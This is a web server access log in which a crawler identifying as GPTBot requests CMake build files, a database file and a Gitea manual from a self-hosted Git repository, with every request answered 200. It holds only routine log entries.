[Length 27401] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10856] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" +[17/Feb/2026:14:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10458] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:14:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19462] [Gzip 6.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10870] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" +[17/Feb/2026:14:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" +[17/Feb/2026:14:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17359] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14350] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" +[17/Feb/2026:14:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 22985] [Gzip 10.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" +[17/Feb/2026:14:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11110] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14113] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11269] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14155] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11140] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11296] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21302] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21332] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11835] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11869] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14689] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10203] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10227] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31132] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31164] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10659] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10629] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10216] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11034] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11064] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 